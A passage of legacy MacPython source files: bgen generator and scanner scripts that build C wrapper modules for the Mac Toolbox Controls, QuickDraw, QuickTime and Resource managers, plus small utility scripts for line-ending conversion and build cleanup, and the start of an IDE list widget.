itself->size, itself->style, itself->mode, itself->just,
QdRGB_New, &itself->foreColor, QdRGB_New, &itself->backColor);
}
#endif
ControlFontStyle_Convert(v, itself)
PyObject *v;
ControlFontStyleRec *itself;
{
return PyArg_ParseTuple(v, "hhhhhhO&O&", &itself->flags,
&itself->font, &itself->size, &itself->style, &itself->mode,
&itself->just, QdRGB_Convert, &itself->foreColor,
QdRGB_Convert, &itself->backColor);
}
/* TrackControl callback support */
static PyObject *tracker;
static ControlActionUPP mytracker_upp;
extern int settrackfunc(PyObject *); /* forward */
extern void clrtrackfunc(void); /* forward */
"""
finalstuff = finalstuff + """
PyObject *CtlObj_NewUnmanaged(itself)
ControlHandle itself;
{
ControlObject *it;
if (itself == NULL) return PyMac_Error(resNotFound);
it = PyObject_NEW(ControlObject, &Control_Type);
if (it == NULL) return NULL;
it->ob_itself = itself;
return (PyObject *)it;
}
PyObject *
CtlObj_WhichControl(ControlHandle c)
{
PyObject *it;
if (c == NULL)
it = Py_None;
else {
it = (PyObject *) GetControlReference(c);
/*
** If the refcon is zero or doesn't point back to the Python object
** the control is not ours. Return a temporary object.
*/
if (it == NULL || ((ControlObject *)it)->ob_itself != c)
return CtlObj_NewUnmanaged(c);
}
Py_INCREF(it);
return it;
}
static int
settrackfunc(obj)
PyObject *obj;
{
if (tracker) {
PyErr_SetString(Ctl_Error, "Tracker function in use");
return 0;
}
tracker = obj;
Py_INCREF(tracker);
}
static void
clrtrackfunc()
{
Py_XDECREF(tracker);
tracker = 0;
}
static pascal void
mytracker(ctl, part)
ControlHandle ctl;
short part;
{
PyObject *args, *rv=0;
args = Py_BuildValue("(O&i)", CtlObj_WhichControl, ctl, (int)part);
if (args && tracker) {
rv = PyEval_CallObject(tracker, args);
Py_DECREF(args);
}
if (rv)
Py_DECREF(rv);
else
PySys_WriteStderr("TrackControl: exception in tracker function\\n");
}
"""
initstuff = initstuff + """
mytracker_upp = NewControlActionProc(mytracker);
"""
class MyObjectDefinition(ObjectIdentityMixin, GlobalObjectDefinition):
def outputCheckNewArg(self):
Output("if (itself == NULL) return PyMac_Error(resNotFound);")
def outputInitStructMembers(self):
GlobalObjectDefinition.outputInitStructMembers(self)
Output("SetControlReference(itself, (long)it);")
def outputCleanupStructMembers(self):
Output("if (self->ob_itself) SetControlReference(self->ob_itself, (long)0); /* Make it forget about us */")
# Create the generator groups and link them
module = MacModule(MODNAME, MODPREFIX, includestuff, finalstuff, initstuff)
object = MyObjectDefinition(OBJECTNAME, OBJECTPREFIX, OBJECTTYPE)
module.addobject(object)
# Create the generator classes used to populate the lists
Function = OSErrFunctionGenerator
Method = OSErrMethodGenerator
# Create and populate the lists
functions = []
methods = []
execfile(INPUTFILE)
execfile('ctledit.py')
# add the populated lists to the generator groups
for f in functions: module.add(f)
for f in methods: object.add(f)
# Manual generator for TrackControl, due to callback ideosyncracies
trackcontrol_body = """
ControlPartCode _rv;
Point startPoint;
ControlActionUPP upp = 0;
PyObject *callback = 0;
if (!PyArg_ParseTuple(_args, "O&|O",
PyMac_GetPoint, &startPoint, &callback))
return NULL;
if (callback && callback != Py_None) {
if (PyInt_Check(callback) && PyInt_AS_LONG(callback) == -1)
upp = (ControlActionUPP)-1;
else {
settrackfunc(callback);
upp = mytracker_upp;
}
}
_rv = TrackControl(_self->ob_itself,
startPoint,
upp);
clrtrackfunc();
_res = Py_BuildValue("h",
_rv);
return _res;
"""
f = ManualGenerator("TrackControl", trackcontrol_body);
#f.docstring = "(Point startPoint [,trackercallback]) -> (ControlPartCode _rv)"
object.add(f)
# And manual generators to get/set popup menu information
getpopupdata_body = """
PopupPrivateDataHandle hdl;
if ( (*_self->ob_itself)->contrlData == NULL ) {
PyErr_SetString(Ctl_Error, "No contrlData handle in control");
return 0;
}
hdl = (PopupPrivateDataHandle)(*_self->ob_itself)->contrlData;
HLock((Handle)hdl);
_res = Py_BuildValue("O&i", MenuObj_New, (*hdl)->mHandle, (int)(*hdl)->mID);
HUnlock((Handle)hdl);
return _res;
"""
f = ManualGenerator("GetPopupData", getpopupdata_body)
object.add(f)
setpopupdata_body = """
PopupPrivateDataHandle hdl;
MenuHandle mHandle;
short mID;
if (!PyArg_ParseTuple(_args, "O&h", MenuObj_Convert, &mHandle, &mID) )
return 0;
if ( (*_self->ob_itself)->contrlData == NULL ) {
PyErr_SetString(Ctl_Error, "No contrlData handle in control");
return 0;
}
hdl = (PopupPrivateDataHandle)(*_self->ob_itself)->contrlData;
(*hdl)->mHandle = mHandle;
(*hdl)->mID = mID;
Py_INCREF(Py_None);
return Py_None;
"""
f = ManualGenerator("SetPopupData", setpopupdata_body)
object.add(f)
# generate output (open the output file as late as possible)
SetOutputFileName(OUTPUTFILE)
module.generate()
```
#### File: Modules/qd/qdscan.py
```python
import sys
import os
BGENDIR=os.path.join(sys.prefix, ':Tools:bgen:bgen')
sys.path.append(BGENDIR)
from scantools import Scanner
from bgenlocations import TOOLBOXDIR
def main():
input = "QuickDraw.h"
output = "qdgen.py"
defsoutput = TOOLBOXDIR + "QuickDraw.py"
scanner = MyScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
# Grmpf. Universal Headers have Text-stuff in a different include file...
input = "QuickDrawText.h"
output = "@qdgentext.py"
defsoutput = "@QuickDrawText.py"
have_extra = 0
try:
scanner = MyScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
have_extra = 1
except IOError:
pass
if have_extra:
print "=== Copying QuickDrawText stuff into main files... ==="
ifp = open("@qdgentext.py")
ofp = open("qdgen.py", "a")
ofp.write(ifp.read())
ifp.close()
ofp.close()
ifp = open("@QuickDrawText.py")
ofp = open(TOOLBOXDIR + "QuickDraw.py", "a")
ofp.write(ifp.read())
ifp.close()
ofp.close()
print "=== Done scanning and generating, now importing the generated code... ==="
import qdsupport
print "=== Done. It's up to you to compile it now! ==="
class MyScanner(Scanner):
def destination(self, type, name, arglist):
classname = "Function"
listname = "functions"
if arglist:
t, n, m = arglist[0]
## elif t == "PolyHandle" and m == "InMode":
## classname = "Method"
## listname = "p_methods"
## elif t == "RgnHandle" and m == "InMode":
## classname = "Method"
## listname = "r_methods"
return classname, listname
def writeinitialdefs(self):
self.defsfile.write("""
def FOUR_CHAR_CODE(x): return x
normal = 0
bold = 1
italic = 2
underline = 4
outline = 8
shadow = 0x10
condense = 0x20
extend = 0x40
""")
def makeblacklistnames(self):
return [
'InitGraf',
'StuffHex',
'StdLine',
'StdComment',
'StdGetPic',
'OpenPort',
'InitPort',
'ClosePort',
'OpenCPort',
'InitCPort',
'CloseCPort',
'BitMapToRegionGlue',
'StdOpcode', # XXXX Missing from library...
# The following are for non-macos use:
'LockPortBits',
'UnlockPortBits',
'UpdatePort',
'GetPortNativeWindow',
'GetNativeWindowPort',
'NativeRegionToMacRegion',
'MacRegionToNativeRegion',
'GetPortHWND',
'GetHWNDPort',
'GetPICTFromDIB',
]
def makeblacklisttypes(self):
return [
## 'CCrsrHandle',
'CIconHandle', # Obsolete
'CQDProcs',
'CSpecArray',
## 'CTabHandle',
'ColorComplementProcPtr',
'ColorComplementUPP',
'ColorSearchProcPtr',
'ColorSearchUPP',
'ConstPatternParam',
'DeviceLoopDrawingProcPtr',
'DeviceLoopFlags',
## 'FontInfo',
## 'GDHandle',
'GrafVerb',
'OpenCPicParams_ptr',
'Ptr',
'QDProcs',
'ReqListRec',
'void_ptr',
]
def makerepairinstructions(self):
return [
([('void_ptr', 'textBuf', 'InMode'),
('short', 'firstByte', 'InMode'),
('short', 'byteCount', 'InMode')],
[('TextThingie', '*', '*'), ('*', '*', '*'), ('*', '*', '*')]),
# GetPen and SetPt use a point-pointer as output-only:
('GetPen', [('Point', '*', 'OutMode')], [('*', '*', 'OutMode')]),
('SetPt', [('Point', '*', 'OutMode')], [('*', '*', 'OutMode')]),
# All others use it as input/output:
([('Point', '*', 'OutMode')],
[('*', '*', 'InOutMode')]),
# InsetRect, OffsetRect
([('Rect', 'r', 'OutMode'),
('short', 'dh', 'InMode'),
('short', 'dv', 'InMode')],
[('Rect', 'r', 'InOutMode'),
('short', 'dh', 'InMode'),
('short', 'dv', 'InMode')]),
# MapRect
([('Rect', 'r', 'OutMode'),
('Rect_ptr', 'srcRect', 'InMode'),
('Rect_ptr', 'dstRect', 'InMode')],
[('Rect', 'r', 'InOutMode'),
('Rect_ptr', 'srcRect', 'InMode'),
('Rect_ptr', 'dstRect', 'InMode')]),
# CopyBits and friends
([('RgnHandle', 'maskRgn', 'InMode')],
[('OptRgnHandle', 'maskRgn', 'InMode')]),
]
if __name__ == "__main__":
main()
```
#### File: Modules/qd/qdsupport.py
```python
import string
# Declarations that change for each manager
MACHEADERFILE = 'QuickDraw.h' # The Apple header file
MODNAME = 'Qd' # The name of the module
OBJECTNAME = 'Graf' # The basic name of the objects used here
# The following is *usually* unchanged but may still require tuning
MODPREFIX = MODNAME # The prefix for module-wide routines
OBJECTTYPE = OBJECTNAME + 'Ptr' # The C type used to represent them
OBJECTPREFIX = MODPREFIX + 'Obj' # The prefix for object methods
INPUTFILE = string.lower(MODPREFIX) + 'gen.py' # The file generated by the scanner
EXTRAFILE = string.lower(MODPREFIX) + 'edit.py' # A similar file but hand-made
OUTPUTFILE = MODNAME + "module.c" # The file generated by this program
from macsupport import *
# Create the type objects
class TextThingieClass(FixedInputBufferType):
def getargsCheck(self, name):
pass
TextThingie = TextThingieClass(None)
# These are temporary!
RgnHandle = OpaqueByValueType("RgnHandle", "ResObj")
OptRgnHandle = OpaqueByValueType("RgnHandle", "OptResObj")
PicHandle = OpaqueByValueType("PicHandle", "ResObj")
PolyHandle = OpaqueByValueType("PolyHandle", "ResObj")
PixMapHandle = OpaqueByValueType("PixMapHandle", "ResObj")
PixPatHandle = OpaqueByValueType("PixPatHandle", "ResObj")
PatHandle = OpaqueByValueType("PatHandle", "ResObj")
CursHandle = OpaqueByValueType("CursHandle", "ResObj")
CCrsrHandle = OpaqueByValueType("CCrsrHandle", "ResObj")
CIconHandle = OpaqueByValueType("CIconHandle", "ResObj")
CTabHandle = OpaqueByValueType("CTabHandle", "ResObj")
ITabHandle = OpaqueByValueType("ITabHandle", "ResObj")
GDHandle = OpaqueByValueType("GDHandle", "ResObj")
CGrafPtr = OpaqueByValueType("CGrafPtr", "GrafObj")
GrafPtr = OpaqueByValueType("GrafPtr", "GrafObj")
BitMap_ptr = OpaqueByValueType("BitMapPtr", "BMObj")
RGBColor = OpaqueType('RGBColor', 'QdRGB')
RGBColor_ptr = RGBColor
FontInfo = OpaqueType('FontInfo', 'QdFI')
Cursor_ptr = StructInputBufferType('Cursor')
Pattern = StructOutputBufferType('Pattern')
Pattern_ptr = StructInputBufferType('Pattern')
PenState = StructOutputBufferType('PenState')
PenState_ptr = StructInputBufferType('PenState')
includestuff = includestuff + """
#include <%s>""" % MACHEADERFILE + """
#define resNotFound -192 /* Can't include <Errors.h> because of Python's "errors.h" */
/*
** Parse/generate RGB records
*/
PyObject *QdRGB_New(itself)
RGBColorPtr itself;
{
return Py_BuildValue("lll", (long)itself->red, (long)itself->green, (long)itself->blue);
}
QdRGB_Convert(v, p_itself)
PyObject *v;
RGBColorPtr p_itself;
{
long red, green, blue;
if( !PyArg_ParseTuple(v, "lll", &red, &green, &blue) )
return 0;
p_itself->red = (unsigned short)red;
p_itself->green = (unsigned short)green;
p_itself->blue = (unsigned short)blue;
return 1;
}
/*
** Generate FontInfo records
*/
static
PyObject *QdFI_New(itself)
FontInfo *itself;
{
return Py_BuildValue("hhhh", itself->ascent, itself->descent,
itself->widMax, itself->leading);
}
"""
variablestuff = """
{
PyObject *o;
o = QDGA_New();
if (o == NULL || PyDict_SetItemString(d, "qd", o) != 0)
Py_FatalError("can't initialize Qd.qd");
}
"""
## not yet...
##
##class Region_ObjectDefinition(GlobalObjectDefinition):
## def outputCheckNewArg(self):
## Output("if (itself == NULL) return PyMac_Error(resNotFound);")
## def outputFreeIt(self, itselfname):
## Output("DisposeRegion(%s);", itselfname)
##
##class Polygon_ObjectDefinition(GlobalObjectDefinition):
## def outputCheckNewArg(self):
## Output("if (itself == NULL) return PyMac_Error(resNotFound);")
## def outputFreeIt(self, itselfname):
## Output("KillPoly(%s);", itselfname)
class MyGRObjectDefinition(GlobalObjectDefinition):
def outputCheckNewArg(self):
Output("if (itself == NULL) return PyMac_Error(resNotFound);")
def outputCheckConvertArg(self):
OutLbrace("if (DlgObj_Check(v) || WinObj_Check(v))")
Output("*p_itself = ((GrafPortObject *)v)->ob_itself;")
Output("return 1;")
OutRbrace()
def outputGetattrHook(self):
Output("""
{ CGrafPtr itself_color = (CGrafPtr)self->ob_itself;
if ( strcmp(name, "data") == 0 )
return PyString_FromStringAndSize((char *)self->ob_itself, sizeof(GrafPort));
if ( (itself_color->portVersion&0xc000) == 0xc000 ) {
/* Color-only attributes */
if ( strcmp(name, "portBits") == 0 )
/* XXXX Do we need HLock() stuff here?? */
return BMObj_New((BitMapPtr)*itself_color->portPixMap);
if ( strcmp(name, "grafVars") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)itself_color->visRgn);
if ( strcmp(name, "chExtra") == 0 )
return Py_BuildValue("h", itself_color->chExtra);
if ( strcmp(name, "pnLocHFrac") == 0 )
return Py_BuildValue("h", itself_color->pnLocHFrac);
if ( strcmp(name, "bkPixPat") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)itself_color->bkPixPat);
if ( strcmp(name, "rgbFgColor") == 0 )
return Py_BuildValue("O&", QdRGB_New, &itself_color->rgbFgColor);
if ( strcmp(name, "rgbBkColor") == 0 )
return Py_BuildValue("O&", QdRGB_New, &itself_color->rgbBkColor);
if ( strcmp(name, "pnPixPat") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)itself_color->pnPixPat);
if ( strcmp(name, "fillPixPat") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)itself_color->fillPixPat);
} else {
/* Mono-only attributes */
if ( strcmp(name, "portBits") == 0 )
return BMObj_New(&self->ob_itself->portBits);
if ( strcmp(name, "bkPat") == 0 )
return Py_BuildValue("s#", (char *)&self->ob_itself->bkPat, sizeof(Pattern));
if ( strcmp(name, "fillPat") == 0 )
return Py_BuildValue("s#", (char *)&self->ob_itself->fillPat, sizeof(Pattern));
if ( strcmp(name, "pnPat") == 0 )
return Py_BuildValue("s#", (char *)&self->ob_itself->pnPat, sizeof(Pattern));
}
/*
** Accessible for both color/mono windows.
** portVersion is really color-only, but we put it here
** for convenience
*/
if ( strcmp(name, "portVersion") == 0 )
return Py_BuildValue("h", itself_color->portVersion);
if ( strcmp(name, "device") == 0 )
return PyInt_FromLong((long)self->ob_itself->device);
if ( strcmp(name, "portRect") == 0 )
return Py_BuildValue("O&", PyMac_BuildRect, &self->ob_itself->portRect);
if ( strcmp(name, "visRgn") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)self->ob_itself->visRgn);
if ( strcmp(name, "clipRgn") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)self->ob_itself->clipRgn);
if ( strcmp(name, "pnLoc") == 0 )
return Py_BuildValue("O&", PyMac_BuildPoint, self->ob_itself->pnLoc);
if ( strcmp(name, "pnSize") == 0 )
return Py_BuildValue("O&", PyMac_BuildPoint, self->ob_itself->pnSize);
if ( strcmp(name, "pnMode") == 0 )
return Py_BuildValue("h", self->ob_itself->pnMode);
if ( strcmp(name, "pnVis") == 0 )
return Py_BuildValue("h", self->ob_itself->pnVis);
if ( strcmp(name, "txFont") == 0 )
return Py_BuildValue("h", self->ob_itself->txFont);
if ( strcmp(name, "txFace") == 0 )
return Py_BuildValue("h", (short)self->ob_itself->txFace);
if ( strcmp(name, "txMode") == 0 )
return Py_BuildValue("h", self->ob_itself->txMode);
if ( strcmp(name, "txSize") == 0 )
return Py_BuildValue("h", self->ob_itself->txSize);
if ( strcmp(name, "spExtra") == 0 )
return Py_BuildValue("O&", PyMac_BuildFixed, self->ob_itself->spExtra);
/* XXXX Add more, as needed */
/* This one is so we can compare grafports: */
if ( strcmp(name, "_id") == 0 )
return Py_BuildValue("l", (long)self->ob_itself);
}""")
class MyBMObjectDefinition(GlobalObjectDefinition):
def outputCheckNewArg(self):
Output("if (itself == NULL) return PyMac_Error(resNotFound);")
def outputStructMembers(self):
# We need to more items: a pointer to privately allocated data
# and a python object we're referring to.
Output("%s ob_itself;", self.itselftype)
Output("PyObject *referred_object;")
Output("BitMap *referred_bitmap;")
def outputInitStructMembers(self):
Output("it->ob_itself = %sitself;", self.argref)
Output("it->referred_object = NULL;")
Output("it->referred_bitmap = NULL;")
def outputCleanupStructMembers(self):
Output("Py_XDECREF(self->referred_object);")
Output("if (self->referred_bitmap) free(self->referred_bitmap);")
def outputGetattrHook(self):
Output("""if ( strcmp(name, "baseAddr") == 0 )
return PyInt_FromLong((long)self->ob_itself->baseAddr);
if ( strcmp(name, "rowBytes") == 0 )
return PyInt_FromLong((long)self->ob_itself->rowBytes);
if ( strcmp(name, "bounds") == 0 )
return Py_BuildValue("O&", PyMac_BuildRect, &self->ob_itself->bounds);
/* XXXX Add more, as needed */
if ( strcmp(name, "bitmap_data") == 0 )
return PyString_FromStringAndSize((char *)self->ob_itself, sizeof(BitMap));
if ( strcmp(name, "pixmap_data") == 0 )
return PyString_FromStringAndSize((char *)self->ob_itself, sizeof(PixMap));
""")
# This object is instanciated once, and will access qd globals.
class QDGlobalsAccessObjectDefinition(ObjectDefinition):
def outputStructMembers(self):
pass
def outputNew(self):
Output()
Output("%sPyObject *%s_New()", self.static, self.prefix)
OutLbrace()
Output("%s *it;", self.objecttype)
Output("it = PyObject_NEW(%s, &%s);", self.objecttype, self.typename)
Output("if (it == NULL) return NULL;")
Output("return (PyObject *)it;")
OutRbrace()
def outputConvert(self):
pass
def outputCleanupStructMembers(self):
pass
def outputGetattrHook(self):
Output("""
if ( strcmp(name, "arrow") == 0 )
return PyString_FromStringAndSize((char *)&qd.arrow, sizeof(qd.arrow));
if ( strcmp(name, "black") == 0 )
return PyString_FromStringAndSize((char *)&qd.black, sizeof(qd.black));
if ( strcmp(name, "white") == 0 )
return PyString_FromStringAndSize((char *)&qd.white, sizeof(qd.white));
if ( strcmp(name, "gray") == 0 )
return PyString_FromStringAndSize((char *)&qd.gray, sizeof(qd.gray));
if ( strcmp(name, "ltGray") == 0 )
return PyString_FromStringAndSize((char *)&qd.ltGray, sizeof(qd.ltGray));
if ( strcmp(name, "dkGray") == 0 )
return PyString_FromStringAndSize((char *)&qd.dkGray, sizeof(qd.dkGray));
if ( strcmp(name, "screenBits") == 0 )
return BMObj_New(&qd.screenBits);
if ( strcmp(name, "thePort") == 0 )
return GrafObj_New(qd.thePort);
if ( strcmp(name, "randSeed") == 0 )
return Py_BuildValue("l", &qd.randSeed);
""")
# Create the generator groups and link them
module = MacModule(MODNAME, MODPREFIX, includestuff, finalstuff, initstuff, variablestuff)
##r_object = Region_ObjectDefinition('Region', 'QdRgn', 'RgnHandle')
##po_object = Polygon_ObjectDefinition('Polygon', 'QdPgn', 'PolyHandle')
##module.addobject(r_object)
##module.addobject(po_object)
gr_object = MyGRObjectDefinition("GrafPort", "GrafObj", "GrafPtr")
module.addobject(gr_object)
bm_object = MyBMObjectDefinition("BitMap", "BMObj", "BitMapPtr")
module.addobject(bm_object)
qd_object = QDGlobalsAccessObjectDefinition("QDGlobalsAccess", "QDGA", "XXXX")
module.addobject(qd_object)
# Create the generator classes used to populate the lists
Function = OSErrFunctionGenerator
Method = OSErrMethodGenerator
# Create and populate the lists
functions = []
methods = []
execfile(INPUTFILE)
execfile(EXTRAFILE)
# add the populated lists to the generator groups
# (in a different wordl the scan program would generate this)
for f in functions: module.add(f)
##for f in r_methods: r_object.add(f)
##for f in po_methods: po_object.add(f)
#
# We manually generate a routine to create a BitMap from python data.
#
BitMap_body = """
BitMap *ptr;
PyObject *source;
Rect bounds;
int rowbytes;
char *data;
if ( !PyArg_ParseTuple(_args, "O!iO&", &PyString_Type, &source, &rowbytes, PyMac_GetRect,
&bounds) )
return NULL;
data = PyString_AsString(source);
if ((ptr=(BitMap *)malloc(sizeof(BitMap))) == NULL )
return PyErr_NoMemory();
ptr->baseAddr = (Ptr)data;
ptr->rowBytes = rowbytes;
ptr->bounds = bounds;
if ( (_res = BMObj_New(ptr)) == NULL ) {
free(ptr);
return NULL;
}
((BitMapObject *)_res)->referred_object = source;
Py_INCREF(source);
((BitMapObject *)_res)->referred_bitmap = ptr;
return _res;
"""
f = ManualGenerator("BitMap", BitMap_body)
f.docstring = lambda: """Take (string, int, Rect) argument and create BitMap"""
module.add(f)
#
# And again, for turning a correctly-formatted structure into the object
#
RawBitMap_body = """
BitMap *ptr;
PyObject *source;
if ( !PyArg_ParseTuple(_args, "O!", &PyString_Type, &source) )
return NULL;
if ( PyString_Size(source) != sizeof(BitMap) && PyString_Size(source) != sizeof(PixMap) ) {
PyErr_BadArgument();
return NULL;
}
ptr = (BitMapPtr)PyString_AsString(source);
if ( (_res = BMObj_New(ptr)) == NULL ) {
return NULL;
}
((BitMapObject *)_res)->referred_object = source;
Py_INCREF(source);
return _res;
"""
f = ManualGenerator("RawBitMap", RawBitMap_body)
f.docstring = lambda: """Take string BitMap and turn into BitMap object"""
module.add(f)
# generate output (open the output file as late as possible)
SetOutputFileName(OUTPUTFILE)
module.generate()
SetOutputFile() # Close it
```
#### File: Modules/qt/qtscan.py
```python
import sys
import os
BGENDIR=os.path.join(sys.prefix, ':Tools:bgen:bgen')
sys.path.append(BGENDIR)
from scantools import Scanner
from bgenlocations import TOOLBOXDIR
LONG = "QuickTime"
SHORT = "qt"
OBJECTS = ("Movie", "Track", "Media", "UserData", "TimeBase", "MovieController")
def main():
input = "Movies.h"
output = SHORT + "gen.py"
defsoutput = TOOLBOXDIR + LONG + ".py"
scanner = MyScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Done scanning and generating, now importing the generated code... ==="
exec "import " + SHORT + "support"
print "=== Done. It's up to you to compile it now! ==="
class MyScanner(Scanner):
def destination(self, type, name, arglist):
classname = "Function"
listname = "functions"
if arglist:
t, n, m = arglist[0]
if t in OBJECTS and m == "InMode":
classname = "Method"
listname = t + "_methods"
return classname, listname
def writeinitialdefs(self):
self.defsfile.write("def FOUR_CHAR_CODE(x): return x\n")
def makeblacklistnames(self):
return [
"DisposeMovie", # Done on python-object disposal
"DisposeMovieTrack", # ditto
"DisposeTrackMedia", # ditto
"DisposeUserData", # ditto
# "DisposeTimeBase", # ditto
"DisposeMovieController", # ditto
# The following 4 use 'void *' in an uncontrolled way
# TBD when I've read the manual...
"GetUserDataItem",
"SetUserDataItem",
"SetTextSampleData",
"BeginFullScreen",
# bgen gets the argument in/out wrong..
"AddTextSample",
"AddTESample",
"AddHiliteSample",
"HiliteTextSample",
# Missing in CW11 quicktime library
# "SpriteMediaGetDisplayedSampleNumber",
# "SpriteMediaGetIndImageDescription",
# "SpriteMediaCountImages",
# "SpriteMediaCountSprites",
# "SpriteMediaHitTestSprites",
# "SpriteMediaGetProperty",
# "SpriteMediaSetProperty",
# "TextMediaSetTextSampleData",
# "TextMediaHiliteTextSample",
# "TextMediaFindNextText",
# "TextMediaAddHiliteSample",
# "TextMediaAddTESample",
# "TextMediaAddTextSample",
# "VideoMediaGetStatistics",
# "VideoMediaResetStatistics",
# "EndFullScreen",
# "NewMovieFromDataRef",
# "MCPtInController",
# "MCRemoveAMovie",
# "MCRemoveAllMovies",
# "MCInvalidate",
# "InvalidateMovieRegion",
# "GetMovieCompositeBufferFlags",
# "SetMovieCompositeBufferFlags",
# "SetTrackSoundLocalizationSettings",
# "GetTrackSoundLocalizationSettings",
# "GetMovieNaturalBoundsRect",
"MakeTrackTimeTable", # Uses long * return?
"MakeMediaTimeTable", # ditto
"VideoMediaGetStallCount", # Undefined in CW Pro 3 library
]
def makeblacklisttypes(self):
return [
# I don't think we want to do these
"QTSyncTaskPtr",
# We dont do callbacks yet, so no need for these
"QTCallBack",
# Skipped for now, due to laziness
"TrackEditState",
"MovieEditState",
"MatrixRecord",
"MatrixRecord_ptr",
"SampleReferencePtr",
"QTTweener",
# Routine pointers, not yet.
"MoviesErrorUPP",
"MoviePreviewCallOutUPP",
"MovieDrawingCompleteUPP",
"QTCallBackUPP",
"TextMediaUPP",
"MovieProgressUPP",
"MovieRgnCoverUPP",
"MCActionFilterUPP",
"MCActionFilterWithRefConUPP",
"GetMovieUPP",
"ModalFilterUPP",
"TrackTransferUPP",
"QTAtomContainer",
"SpriteWorld",
"Sprite",
]
def makerepairinstructions(self):
return [
([('FSSpec', '*', 'OutMode')], [('FSSpec_ptr', '*', 'InMode')]),
# Movie controller creation
([('ComponentInstance', 'NewMovieController', 'ReturnMode')],
[('MovieController', '*', 'ReturnMode')]),
# NewMovieFromFile
([('short', 'resId', 'OutMode'), ('StringPtr', 'resName', 'InMode')],
[('short', 'resId', 'InOutMode'), ('dummyStringPtr', 'resName', 'InMode')]),
# MCDoAction and more
([('void', '*', 'OutMode')], [('mcactionparams', '*', 'InMode')]),
]
if __name__ == "__main__":
main()
```
#### File: Modules/res/ressupport.py
```python
from macsupport import *
class ResMixIn:
def checkit(self):
OutLbrace()
Output("OSErr _err = ResError();")
Output("if (_err != noErr) return PyMac_Error(_err);")
OutRbrace()
FunctionGenerator.checkit(self) # XXX
class ResFunction(ResMixIn, FunctionGenerator): pass
class ResMethod(ResMixIn, MethodGenerator): pass
# includestuff etc. are imported from macsupport
includestuff = includestuff + """
#include <Resources.h>
#include <string.h>
#define resNotFound -192 /* Can't include <Errors.h> because of Python's "errors.h" */
"""
finalstuff = finalstuff + """
/* Alternative version of ResObj_New, which returns None for null argument */
PyObject *OptResObj_New(itself)
Handle itself;
{
if (itself == NULL) {
Py_INCREF(Py_None);
return Py_None;
}
return ResObj_New(itself);
}
OptResObj_Convert(v, p_itself)
PyObject *v;
Handle *p_itself;
{
if ( v == Py_None ) {
*p_itself = NULL;
return 1;
}
if (!ResObj_Check(v))
{
PyErr_SetString(PyExc_TypeError, "Resource required");
return 0;
}
*p_itself = ((ResourceObject *)v)->ob_itself;
return 1;
}
"""
initstuff = initstuff + """
"""
module = MacModule('Res', 'Res', includestuff, finalstuff, initstuff)
getattrHookCode = """
if (strcmp(name, "size") == 0)
return PyInt_FromLong(GetHandleSize(self->ob_itself));
if (strcmp(name, "data") == 0) {
PyObject *res;
char state;
state = HGetState(self->ob_itself);
HLock(self->ob_itself);
res = PyString_FromStringAndSize(
*self->ob_itself,
GetHandleSize(self->ob_itself));
HUnlock(self->ob_itself);
HSetState(self->ob_itself, state);
return res;
}
if (strcmp(name, "__members__") == 0)
return Py_BuildValue("[ss]", "data", "size");
"""
setattrCode = """
static int
ResObj_setattr(self, name, value)
ResourceObject *self;
char *name;
PyObject *value;
{
char *data;
long size;
if (strcmp(name, "data") != 0 || value == NULL )
return -1;
if ( !PyString_Check(value) )
return -1;
size = PyString_Size(value);
data = PyString_AsString(value);
/* XXXX Do I need the GetState/SetState calls? */
SetHandleSize(self->ob_itself, size);
if ( MemError())
return -1;
HLock(self->ob_itself);
memcpy((char *)*self->ob_itself, data, size);
HUnlock(self->ob_itself);
/* XXXX Should I do the Changed call immedeately? */
return 0;
}
"""
class ResDefiniton(GlobalObjectDefinition):
def outputCheckNewArg(self):
Output("if (itself == NULL) return PyMac_Error(resNotFound);")
def outputGetattrHook(self):
Output(getattrHookCode)
def outputSetattr(self):
Output(setattrCode)
resobject = ResDefiniton('Resource', 'ResObj', 'Handle')
module.addobject(resobject)
functions = []
resmethods = []
execfile('resgen.py')
execfile('resedit.py')
for f in functions: module.add(f)
for f in resmethods: resobject.add(f)
SetOutputFileName('Resmodule.c')
module.generate()
```
#### File: Mac/scripts/crlf.py
```python
import sys
import os
import string
def main():
args = sys.argv[1:]
if not args:
print 'usage:', sys.argv[0], 'file ...'
sys.exit(2)
for file in args:
print file, '...'
data = open(file, 'r').read()
lines = string.splitfields(data, '\r')
newdata = string.joinfields(lines, '\n')
if newdata != data:
print 'rewriting...'
os.rename(file, file + '~')
open(file, 'w').write(newdata)
print 'done.'
else:
print 'no change.'
main()
```
#### File: Mac/scripts/makeclean.py
```python
import macfs
import os
import sys
import re
sweepfiletypes = [
'APPL', # applications
'Atmp', # applet template
'shlb', # shared libs
'MPSY', # SYM and xSYM files
'PYC ', # .pyc files
]
sweepfolderre = re.compile(r"(.*) Data$")
def remove(top):
if os.path.isdir(top):
for name in os.listdir(top):
path = os.path.join(top, name)
remove(path)
os.remove(top)
def walk(top):
if os.path.isdir(top):
m = sweepfolderre.match(top)
if m and os.path.exists(m.group(1) + ".prj"):
print "removing folder:", top
remove(top)
else:
for name in os.listdir(top):
path = os.path.join(top, name)
walk(path)
else:
fss = macfs.FSSpec(top)
cr, tp = fss.GetCreatorType()
if tp in sweepfiletypes and top <> sys.executable:
print "removing file: ", top
remove(top)
fss, ok = macfs.GetDirectory("Please locate the Python home directory")
if ok:
walk(fss.as_pathname())
sys.exit(1) # so we see the results
```
#### File: Tools/IDE/Wlists.py
```python
import Wbase
import Wkeys
import Scrap
import string
import Evt
import Events
import Qd
import Win
class List(Wbase.SelectableWidget):
"""Standard list widget."""
LDEF_ID = 0
def __init__(self, possize, items = None, callback = None, flags = 0, cols = 1):
if items is None:
items = []
self.items = items
Wbase.SelectableWidget.__init__(self, possize)
self._selected = 0
self._enabled = 1
self._list = None
self._cols = cols
self._callback = callback
self._flags = flags
self.lasttyping = ""
self.lasttime = Evt.TickCount()
self.timelimit = 30
self.setitems(items)
self.drawingmode = 0
def open(self):
self.setdrawingmode(0)
self.createlist()
self.setdrawingmode(1)
def createlist(self):
import List
self._calcbounds()
self.SetPort()
rect = self._bounds
